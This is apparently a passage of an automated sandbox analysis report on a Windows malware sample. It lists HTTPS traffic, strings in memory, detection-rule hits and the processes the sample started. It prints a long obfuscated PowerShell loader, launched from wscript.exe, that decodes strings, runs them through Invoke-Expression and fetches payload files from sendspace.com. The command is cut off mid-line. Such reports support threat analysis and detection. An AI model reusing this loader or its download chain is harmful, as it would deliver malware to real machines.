Source: unknown |
HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49704 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49713 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49714 version: TLS 1.2 |
Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2565659187.00000000076C0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4 source: powershell.exe, 00000005.00000002.2565659187.00000000077AA000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ |
Jump to behavior |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/7dhid7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n1.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/medjl1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n2.sendspace.comConnection: Keep-AliveCookie: SID=9rlcod4jutplauo2untp3jfqk6 |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/7dhid7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n1.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/medjl1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n2.sendspace.comConnection: Keep-AliveCookie: SID=9rlcod4jutplauo2untp3jfqk6 |
Source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microt |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FE42000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://fs13n1.sendspace.com |
Source: powershell.exe, 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2F8F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2558091111.0000000004C71000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F31AED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.sendspace.com |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2F8F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.2558091111.0000000004C71000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: wab.exe, 00000008.00000002.2724545147.000000000069D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n2.sendspace.com/ |
Source: wab.exe, 00000008.00000003.2547665932.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n2.sendspace.com/. |
Source: wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n2.sendspace.com/5778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin |
Source: wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119 |
Source: wab.exe, 00000008.00000003.2547665932.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n2.sendspace.com/m |
Source: wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n2.sendspace.com/om:443l |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n1.sendspaX |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n1.sendspace.com |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FE2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F31B0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F2FE13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F31AED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F2FE30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n1.sendspace.com/dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FE30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n1.sendspace.com0 |
Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F30E0B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FB17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F3192E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com |
Source: wab.exe, 00000008.00000002.2724545147.0000000000638000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/ |
Source: wab.exe, 00000008.00000002.2724545147.0000000000638000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/IwX |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FB17000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/7dhid7P |
Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/7dhid7XR |
Source: wab.exe, 00000008.00000002.2724545147.0000000000673000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2725055070.0000000000750000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/medjl1 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49704 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49704 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: unknown |
HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49704 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49713 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49714 version: TLS 1.2 |
Source: amsi64_1988.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_2624.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1988, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 2624, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 7309 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 7309 |
|
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 7309 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 7309 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,l |